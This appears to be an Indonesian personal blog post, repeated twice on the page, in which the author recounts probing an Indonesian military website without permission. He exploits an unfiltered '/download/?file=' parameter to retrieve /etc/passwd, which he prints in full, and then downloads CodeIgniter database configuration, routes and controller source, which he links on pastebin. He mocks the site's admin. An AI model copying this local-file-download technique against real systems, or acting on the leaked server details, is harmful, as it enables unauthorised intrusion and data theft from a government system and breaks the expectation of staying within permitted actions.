Halaman

    Social Items

Visit Namina Blog
  Militer adalah angkatan bersenjata dari suatu negara dan segala sesuatu yang berhubungan dengan angkatan senjata. Militer biasanya terdiri dari atas Prajurit dan Serdadu.
  
  PHP ( Hypertext Preproccesor ) adalah skrip yang dapat di tanamkan atau di sisipkan ke dalam html, php banyak di pakai untuk membuat situs web dinamis.

  Di malam hari yang dingin dan segelas kopi, saya membaca artikel tentang tentara indonesia, entah dari segi latihan atau apapun, saya sangat suka militer dan cita cita saya pun ingin menjadi anggota militer indonesia tapi apalah daya dengan tubuh saya yang tingginya hanya 153 CM, dan persyaratan minimal adalah harus tinggi dengan minimal 163 CM yaps kurang 10 CM dan angka 10 adalah angka yang saya benci.

 Pada malam yang dingin saya dengan iseng membuka salah satu situs web militer indonesia redacted.mil.id dan berniat untuk membaca artikel, tapi setelah saya buka saya lihat tampilan situs web sudah berubah dan system nya pun sudah berubah dari native ke CodeIgniter, saya pun berpikir untuk iseng dan mencoba ngetest systemnya, setiap sebelum mengetest menggunakan tool/apapun saya selalu melihat source view dari situs web target saya.





  
  Setelah saya scroll sampai bawah akhirnya saya menemukan hal yang menarik.

"href="/download/?file='", 
   
 Hal pertama yang terpikirkan oleh saya ketika melihat hal itu adalah "LOCAL FILE DOWNLOAD", dan saya pun mencoba mendownload file sensitif /etc/passwd dan boom sukses terdownload.

root:x:0:0:root:/root:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
cpaneleximfilter:x:203:203::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
nobody:x:99:99:Nobody:/:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailman:x:209:209::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
redacted:x:1272:1276::/home/redacted:/bin/bash
 
Setelah tahu bahwa tidak ada filter pada file download saya pun langsung mendownload file koneksi database dan routes karena target saya menggunakan CI jadi untuk letak file database dan router berada di /application/config/database.php dan /application/config/routes.php setelah itu tinggal mendownload file controller yang berada di folder /application/controller/, karena ini CI jadi untuk nama file itu sama seperti nama class, disini saya melihat suatu class yang membuat saya penasaran, yaitu class ajax karena di route dengan class ajax terdapat fungsi untuk pembarayan dan pengecekan resi JNE, tidak menunggu lama saya langsung mendownload file tersebut dan mengecek source codenya ( bisa kalian lihat source code nya disini : https://pastebin.com/xRYwpFWu ) dan saya pun sedikit terkejut bukan karena fungsi pembayaran tapi fungsi download dan file upload yang tidak ada filter sedikit pun, untuk situs web sekelas pemerintah ini benar benar hal yang fatal karena bisa saja ada orang yang tidak bertanggung jawab yang akan merusak situs web tersebut ( contohnya saya ).


yaps itu saja cerita dari saya, kurang lebihnya mohon maaf terutama untuk admin target saya h3h3, dah lah lanjut nonton bokep lagi.




Militer Dan PHP

  Militer adalah angkatan bersenjata dari suatu negara dan segala sesuatu yang berhubungan dengan angkatan senjata. Militer biasanya terdiri dari atas Prajurit dan Serdadu.
  
  PHP ( Hypertext Preproccesor ) adalah skrip yang dapat di tanamkan atau di sisipkan ke dalam html, php banyak di pakai untuk membuat situs web dinamis.

  Di malam hari yang dingin dan segelas kopi, saya membaca artikel tentang tentara indonesia, entah dari segi latihan atau apapun, saya sangat suka militer dan cita cita saya pun ingin menjadi anggota militer indonesia tapi apalah daya dengan tubuh saya yang tingginya hanya 153 CM, dan persyaratan minimal adalah harus tinggi dengan minimal 163 CM yaps kurang 10 CM dan angka 10 adalah angka yang saya benci.

 Pada malam yang dingin saya dengan iseng membuka salah satu situs web militer indonesia redacted.mil.id dan berniat untuk membaca artikel, tapi setelah saya buka saya lihat tampilan situs web sudah berubah dan system nya pun sudah berubah dari native ke CodeIgniter, saya pun berpikir untuk iseng dan mencoba ngetest systemnya, setiap sebelum mengetest menggunakan tool/apapun saya selalu melihat source view dari situs web target saya.





  
  Setelah saya scroll sampai bawah akhirnya saya menemukan hal yang menarik.

"href="/download/?file='", 
   
 Hal pertama yang terpikirkan oleh saya ketika melihat hal itu adalah "LOCAL FILE DOWNLOAD", dan saya pun mencoba mendownload file sensitif /etc/passwd dan boom sukses terdownload.

root:x:0:0:root:/root:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
cpaneleximfilter:x:203:203::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
nobody:x:99:99:Nobody:/:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailman:x:209:209::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
redacted:x:1272:1276::/home/redacted:/bin/bash
 
Setelah tahu bahwa tidak ada filter pada file download saya pun langsung mendownload file koneksi database dan routes karena target saya menggunakan CI jadi untuk letak file database dan router berada di /application/config/database.php dan /application/config/routes.php setelah itu tinggal mendownload file controller yang berada di folder /application/controller/, karena ini CI jadi untuk nama file itu sama seperti nama class, disini saya melihat suatu class yang membuat saya penasaran, yaitu class ajax karena di route dengan class ajax terdapat fungsi untuk pembarayan dan pengecekan resi JNE, tidak menunggu lama saya langsung mendownload file tersebut dan mengecek source codenya ( bisa kalian lihat source code nya disini : https://pastebin.com/xRYwpFWu ) dan saya pun sedikit terkejut bukan karena fungsi pembayaran tapi fungsi download dan file upload yang tidak ada filter sedikit pun, untuk situs web sekelas pemerintah ini benar benar hal yang fatal karena bisa saja ada orang yang tidak bertanggung jawab yang akan merusak situs web tersebut ( contohnya saya ).


yaps itu saja cerita dari saya, kurang lebihnya mohon maaf terutama untuk admin target saya h3h3, dah lah lanjut nonton bokep lagi.




Tidak ada komentar

Langganan: Posting Komentar (Atom)